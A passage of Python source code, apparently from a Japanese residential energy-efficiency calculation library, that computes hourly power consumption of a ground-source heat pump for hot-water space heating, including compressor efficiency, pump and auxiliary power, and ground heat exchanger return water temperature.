# ---------- 温水暖房用熱源機の平均暖房出力 ----------
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15)
Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType)
# 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14)
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13)
q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t)
# ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ----------
# 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA)
# ---------- 補機の消費電力量 ----------
# 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a)
E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t)
# ---------- ポンプの消費電力量 ----------
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a)
E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t)
# 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a)
E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t)
# 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8)
E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t)
# ---------- 圧縮機の消費電力量 ----------
# 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a)
Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d)
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a)
Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t)
# 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a)
Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t)
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a)
Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d)
# 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a)
Mu_d_t = calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t)
# 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2)
E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t)
# ---------- 熱源機の消費電力量 ----------
# 1時間当たりの熱源機の消費電力量 (kWh/h) (1)
E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t
E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0
return E_E_hs_d_t
# ============================================================================
# N.3.2 ガス消費量
# ============================================================================
def get_E_G_hs_d_t():
"""熱源機のガス消費量
Args:
Returns:
ndarray: 熱源機のガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.3.3 灯油消費量
# ============================================================================
def get_E_K_hs_d_t():
"""熱源機の灯油消費量
Args:
Returns:
ndarray: 熱源機の灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.3.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs_d_t():
"""熱源機のその他の燃料の一次エネルギー消費量
Args:
Returns:
ndarray: 熱源機のその他の燃料の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# N.4 圧縮機の消費電力量
# ============================================================================
def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t):
"""日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量
"""
# 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c)
k_comp_a = -0.7309
k_comp_b = 0.67
k_comp_c = 1.0319
# 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b)
f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c
# 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a)
E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t)
E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0
return E_comp_hs_d_t, f_comp_act_d_t
def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t):
"""日付dの時刻tにおける圧縮機の圧縮効率 (3a)
Args:
Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率
Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃)
Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃)
Returns:
ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a)
"""
# Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_0 = get_K_Mu_h_0()
# Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_1 = get_K_Mu_h_1()
# Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
K_Mu_h_2 = get_K_Mu_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1)
e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t)
# 日付dの時刻tにおける圧縮機の圧縮効率 (3a)
Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0
Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0
return Mu_d_t
def get_K_Mu_h_0():
"""Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return -0.430363368361459
def get_K_Mu_h_1():
"""Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return 0.698531770387591
def get_K_Mu_h_2():
"""Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
Args:
Returns:
float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b)
"""
return 0.0100164335768507
def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d):
"""日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
Returns:
日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
"""
# Kevph0:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_0 = get_K_evp_h_0()
# Kevph1:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_1 = get_K_evp_h_1()
# Kevph2:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_2 = get_K_evp_h_2()
# Kevph12:蒸発温度を計算する式の係数 (-) (4b)
K_evp_h_12 = get_K_evp_h_12()
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a)
Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24)
+ K_evp_h_2 * qr_out_H_hs_d_t
+ K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None)
return Theta_ref_evp_d_t
def get_K_evp_h_0():
"""Kevph0:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph0:蒸発温度を計算する式の係数
"""
return -2.95315205817646
def get_K_evp_h_1():
"""Kevph1:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph1:蒸発温度を計算する式の係数
"""
return 0.915893610614308
def get_K_evp_h_2():
"""Kevph2:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph2:蒸発温度を計算する式の係数
"""
return -11.8319776584846
def get_K_evp_h_12():
"""Kevph12:蒸発温度を計算する式の係数 (-) (4b)
Args:
Returns:
float: Kevph12:蒸発温度を計算する式の係数
"""
return 0.29704275467947
def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t):
"""日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a)
Args:
qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)
"""
# Kcndh0:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_0 = get_K_cnd_h_0()
# Kcndh1:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_1 = get_K_cnd_h_1()
# Kcndh2:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_2 = get_K_cnd_h_2()
# Kcndh12:凝縮温度を計算する式の係数 (-) (5b)
K_cnd_h_12 = get_K_cnd_h_12()
# 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a)
Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t
+ K_cnd_h_2 * qr_out_H_hs_d_t
+ K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65)
return Theta_ref_cnd_d_t
def get_K_cnd_h_0():
"""Kcndh0:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh0:凝縮温度を計算する式の係数
"""
return 3.6105623002886
def get_K_cnd_h_1():
"""Kcndh1:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh1:凝縮温度を計算する式の係数
"""
return 0.930136847064537
def get_K_cnd_h_2():
"""Kcndh2:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
float: Kcndh2:凝縮温度を計算する式の係数
"""
return 0.494024927234563
def get_K_cnd_h_12():
"""Kcndh12:凝縮温度を計算する式の係数 (-) (5b)
Args:
Returns:
ndarray: Kcndh12:凝縮温度を計算する式の係数
"""
return 0.00770898511188855
def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t):
"""日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)
"""
# Ksch0:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_0 = get_K_sc_h_0()
# Ksch1:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_1 = get_K_sc_h_1()
# Ksch2:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_2 = get_K_sc_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a)
Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None)
return Theta_ref_SC_d_t
def get_K_sc_h_0():
"""Ksch0:過冷却度を計算する式の係数(-) (6b)
Args:
Returns:
float: Ksch0:過冷却度を計算する式の係数(-) (6b)
"""
return -4.02655782981397
def get_K_sc_h_1():
"""Ksch1:過冷却度を計算する式の係数 (-) (6b)
Args:
Returns:
float: Ksch1:過冷却度を計算する式の係数
"""
return 0.0894330494418674
def get_K_sc_h_2():
"""Ksch2:過冷却度を計算する式の係数 (-) (6b)
Args:
Returns:
float: Ksch2:過冷却度を計算する式の係数
"""
return 14.3457831669162
def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d):
"""日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)
"""
# Kshh0:過熱度を計算する式の係数 (-) (7b)
K_sh_h_0 = get_K_sh_h_0()
# Kshh1:過熱度を計算する式の係数 (-) (7b)
K_sh_h_1 = get_K_sh_h_1()
# Kshh2:過熱度を計算する式の係数 (-) (7b)
K_sh_h_2 = get_K_sh_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a)
Theta_ref_SC_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None)
return Theta_ref_SC_d_t
def get_K_sh_h_0():
"""Kshh0:過熱度を計算する式の係数(-) (7b)
Args:
Returns:
float: Kshh0:過熱度を計算する式の係数
"""
return 0.819643791668597
def get_K_sh_h_1():
"""Kshh1:過熱度を計算する式の係数 (-) (7b)
Args:
Returns:
float: Kshh1:過熱度を計算する式の係数 (-)
"""
return 2.99282570323758
def get_K_sh_h_2():
"""Kshh2:過熱度を計算する式の係数 (-) (7b)
Args:
Returns:
Kshh2:過熱度を計算する式の係数 (-)
"""
return -0.0762659183765636
# ============================================================================
# N.5 ポンプの消費電力量
# ============================================================================
def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t):
"""日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8)
Args:
E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h)
E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h)
"""
# 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8)
E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t
return E_pump_hs_d_t
def calc_E_pump_SW_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h)
"""
# apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
a_pump_SW = get_a_pump_SW()
# bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
b_pump_SW = get_b_pump_SW()
# 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a)
E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2)
return E_pump_SW_d_t
def get_a_pump_SW():
"""apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
Args:
Returns:
float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.041972403
def get_b_pump_SW():
"""bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
Args:
Returns:
float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.104478967
def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h)
"""
# apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
a_pump_gsRW = get_a_pump_gsRW()
# bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
b_pump_gsRW = get_b_pump_gsRW()
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a)
E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * (qr_out_H_hs_d_t ** 2)
return E_pump_gsRW_d_t
def get_a_pump_gsRW():
"""apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
Args:
Returns:
float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.062196275
def get_b_pump_gsRW():
"""bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
Args:
Returns:
bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.071756474
# ============================================================================
# N.6 補機の消費電力量
# ============================================================================
def calc_E_aux_hs_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h)
"""
# kauxh0:補機の消費電力量を計算する式の係数 (-) (11b)
kauxh0 = get_kauxh0()
# kauxh1:補機の消費電力量を計算する式の係数 (-) (11b)
kauxh1 = get_kauxh1()
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a)
E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0
return E_aux_hs_d_t
def get_kauxh0():
"""kauxh0:補機の消費電力量を計算する式の係数 (-) (11b)
Args:
Returns:
float: kauxh0:補機の消費電力量を計算する式の係数 (-)
"""
return 0.0433205551083371
def get_kauxh1():
"""kauxh1:補機の消費電力量を計算する式の係数 (-) (11b)
Args:
Returns:
float: kauxh1:補機の消費電力量を計算する式の係数 (-)
"""
return 0.0173758330059922
# ============================================================================
# N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率
# ============================================================================
def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA):
"""日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
Args:
q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)
Returns:
ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
"""
# 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA
return qr_out_H_hs_d_t
# ============================================================================
# N.8 温水暖房用熱源機の平均暖房出力
# ============================================================================
def get_q_out_H_hs_d_t(Q_out_H_hs_d_t):
"""日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13)
Args:
Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)
Returns:
ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)
"""
# 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13)
q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3
return q_out_H_hs_d_t
def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14)
Args:
Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h)
Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)
"""
# 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14)
return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0)
def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15)
Args:
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
q_max_hs(float): 熱源機の最大暖房能力 ⒲
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)
"""
# ---------- 地中熱交換器からの戻り熱源水の日平均温度 ----------
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = get_L_max_H(L_H_x_t_i)
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = get_R_L_max(L_max_H, L_max_C)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType)
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17)
Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave,
Delta_Theta_gsRW_H)
# ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ----------
q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs)
# ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ----------
Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t
+ 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6)
return Q_max_H_hs_d_t
# ============================================================================
# N.9 温水暖房用熱源機内の平均放熱損失
# ============================================================================
def get_q_loss_H_hs_d_t():
"""日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW)
Args:
Returns:
float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW)
"""
return 0
# ============================================================================
# N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力
# ============================================================================
def calc_q_max_H_hs_JRA(q_max_hs):
"""地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16)
Args:
q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲
Returns:
地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)
"""
# 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
f_crated = get_f_crated()
# 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16)
q_max_H_hs_JRA = q_max_hs * f_crated
return q_max_H_hs_JRA
def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の定格能力
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 温水暖房用熱源機の定格能力
"""
# 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
def get_f_crated():
"""地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
Args:
Returns:
float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
"""
return 1.35
# ============================================================================
# N.11 地中熱交換器からの戻り熱源水の日平均温度
# ============================================================================
def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H):
"""日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17)
Args:
K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)
Returns:
ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
"""
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17)
Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H
return Theta_gsRW_d_ave_d
def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType):
"""暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Args:
R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)
HeatExchangerType(str): 地中熱交換器タイプ
Returns:
float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)
"""
# 熱交換器タイプに応じた係数取得
a_gsRW_H = get_a_gsRW_H(HeatExchangerType)
b_gsRW_H = get_b_gsRW_H(HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H
return Delta_Theta_gsRW_H
def calc_K_gsRW_H(R_L_max, HeatExchangerType):
"""地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
Args:
R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
"""
# 熱交換器タイプに応じた係数取得
c_gsRW_H = get_c_gsRW_H(HeatExchangerType)
d_gsRW_H = get_d_gsRW_H(HeatExchangerType)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H
return K_gsRW_H
def get_a_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数a_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数a_gsRW_Hの取得
"""
